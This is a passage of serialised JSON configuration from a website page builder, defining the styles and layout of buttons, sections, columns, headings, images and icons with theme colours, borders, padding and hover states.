|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":false}},\"props\":{\"buttonSize\":\"medium\",\"buttonWidth\":\"fitToContent\"}},{\"id\":679,\"type\":\"hop-button\",\"nodeId\":\"22-h39\",\"nodes\":[\"22-h39\"],\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":680,\"type\":\"hop-section\",\"nodeId\":\"182-c212\",\"nodes\":[\"182-c219\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":681,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c213\",\"nodes\":[\"182-c220\"],\"v\":\"1.1\"},{\"id\":683,\"type\":\"hop-column\",\"nodeId\":\"182-c215\",\"nodes\":[\"182-c221\"],\"v\":\"1.1\"},{\"id\":684,\"type\":\"hop-heading\",\"nodeId\":\"182-c216\",\"nodes\":[\"182-c222\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"2\"}},{\"id\":694,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c226\",\"nodes\":[\"182-c223\"],\"v\":\"1.1\"},{\"id\":695,\"type\":\"hop-column\",\"nodeId\":\"182-c227\",\"nodes\":[\"182-c217\"],\"v\":\"1.1\"},{\"id\":696,\"type\":\"hop-column\",\"nodeId\":\"182-c228\",\"nodes\":[\"182-c220\"],\"v\":\"1.1\"},{\"id\":697,\"type\":\"hop-column\",\"nodeId\":\"182-c229\",\"nodes\":[\"182-c221\"],\"v\":\"1.1\"},{\"id\":698,\"type\":\"hop-column\",\"nodeId\":\"182-c230\",\"nodes\":[\"182-c222\"],\"v\":\"1.1\"},{\"id\":699,\"type\":\"hop-heading\",\"nodeId\":\"182-c231\",\"nodes\":[\"182-c219\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\"},\"props\":{\"headerType\":\"4\"}},{\"id\":700,\"type\":\"hop-image\",\"nodeId\":\"182-c232\",\"nodes\":[\"182-c218\"],\"v\":\"1.1\"},{\"id\":701,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c223\",\"nodes\":[\"182-c223\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":702,\"type\":\"hop-column\",\"nodeId\":\"182-c224\",\"nodes\":[\"182-c224\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":703,\"type\":\"hop-column\",\"nodeId\":\"182-c225\",\"nodes\":[\"182-c225\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":704,\"type\":\"hop-heading\",\"nodeId\":\"182-c226\",\"nodes\":[\"182-c226\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"headerType\":\"4\"}},{\"id\":707,\"type\":\"hop-image\",\"nodeId\":\"182-c229\",\"nodes\":[\"182-c229\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":709,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}},\"backgroundColor\":\"${theme.colors.3|variant3}\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"182-c230\"]},{\"id\":710,\"type\":\"hop-text\",\"nodeId\":\"182-c231\",\"nodes\":[\"182-c231\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[],\"desktop\":[]}}},{\"id\":711,\"type\":\"hop-column\",\"nodeId\":\"182-c230\",\"nodes\":[\"182-c230\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":740,\"type\":\"hop-column\",\"nodeId\":\"182-c283\",\"nodes\":[\"182-c130\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":745,\"type\":\"hop-image\",\"nodeId\":\"182-c287\",\"nodes\":[\"182-c131\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"style\":\"none\"},\"left\":{\"style\":\"none\"}},\"boxShadow\":{\"enabled\":false}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"style\":\"none\"},\"left\":{\"style\":\"none\"}}},\"frameImage\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}}}}}}}},{\"id\":746,\"type\":\"hop-heading\",\"nodeId\":\"182-c288\",\"nodes\":[\"182-c132\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":747,\"type\":\"hop-text\",\"nodeId\":\"182-c289\",\"nodes\":[\"182-c133\"],\"v\":\"1.1\"},{\"id\":749,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\"}},\"textAlign\":\"center\"},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c134\"]},{\"id\":750,\"type\":\"hop-column\",\"nodeId\":\"182-c291\",\"nodes\":[\"182-c112\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":751,\"type\":\"hop-column\",\"nodeId\":\"182-c292\",\"nodes\":[\"182-c107\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":752,\"type\":\"hop-image\",\"nodeId\":\"182-c293\",\"nodes\":[\"182-c113\"],\"v\":\"1.1\"},{\"id\":753,\"type\":\"hop-heading\",\"nodeId\":\"182-c294\",\"nodes\":[\"182-c114\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":754,\"type\":\"hop-text\",\"nodeId\":\"182-c295\",\"nodes\":[\"182-c115\"],\"v\":\"1.1\"},{\"id\":755,\"type\":\"hop-image\",\"nodeId\":\"182-c296\",\"nodes\":[\"182-c108\"],\"v\":\"1.1\"},{\"id\":756,\"type\":\"hop-heading\",\"nodeId\":\"182-c297\",\"nodes\":[\"182-c109\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":757,\"type\":\"hop-text\",\"nodeId\":\"182-c298\",\"nodes\":[\"182-c110\"],\"v\":\"1.1\"},{\"id\":759,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c111\"]},{\"id\":761,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c116\"]},{\"id\":765,\"type\":\"hop-heading\",\"nodeId\":\"182-c304\",\"nodes\":[\"182-c304\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":766,\"type\":\"hop-column\",\"nodeId\":\"182-c305\",\"nodes\":[\"182-c154\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":767,\"type\":\"hop-image\",\"nodeId\":\"182-c306\",\"nodes\":[\"182-c155\"],\"v\":\"1.1\"},{\"id\":768,\"type\":\"hop-heading\",\"nodeId\":\"182-c307\",\"nodes\":[\"182-c156\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":770,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c158\"]},{\"id\":771,\"type\":\"hop-text\",\"nodeId\":\"182-c309\",\"nodes\":[\"182-c157\"],\"v\":\"1.1\"},{\"id\":772,\"type\":\"hop-column\",\"nodeId\":\"182-c310\",\"nodes\":[\"182-c173\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":773,\"type\":\"hop-column\",\"nodeId\":\"182-c311\",\"nodes\":[\"182-c178\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":774,\"type\":\"hop-column\",\"nodeId\":\"182-c312\",\"nodes\":[\"182-c183\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":775,\"type\":\"hop-column\",\"nodeId\":\"182-c313\",\"nodes\":[\"182-c187\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":776,\"type\":\"hop-image\",\"nodeId\":\"182-c314\",\"nodes\":[\"182-c174\"],\"v\":\"1.1\"},{\"id\":777,\"type\":\"hop-heading\",\"nodeId\":\"182-c315\",\"nodes\":[\"182-c175\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":778,\"type\":\"hop-text\",\"nodeId\":\"182-c316\",\"nodes\":[\"182-c176\"],\"v\":\"1.1\"},{\"id\":780,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c177\"]},{\"id\":781,\"type\":\"hop-image\",\"nodeId\":\"182-c318\",\"nodes\":[\"182-c179\"],\"v\":\"1.1\"},{\"id\":782,\"type\":\"hop-heading\",\"nodeId\":\"182-c319\",\"nodes\":[\"182-c180\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":783,\"type\":\"hop-text\",\"nodeId\":\"182-c320\",\"nodes\":[\"182-c181\"],\"v\":\"1.1\"},{\"id\":785,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 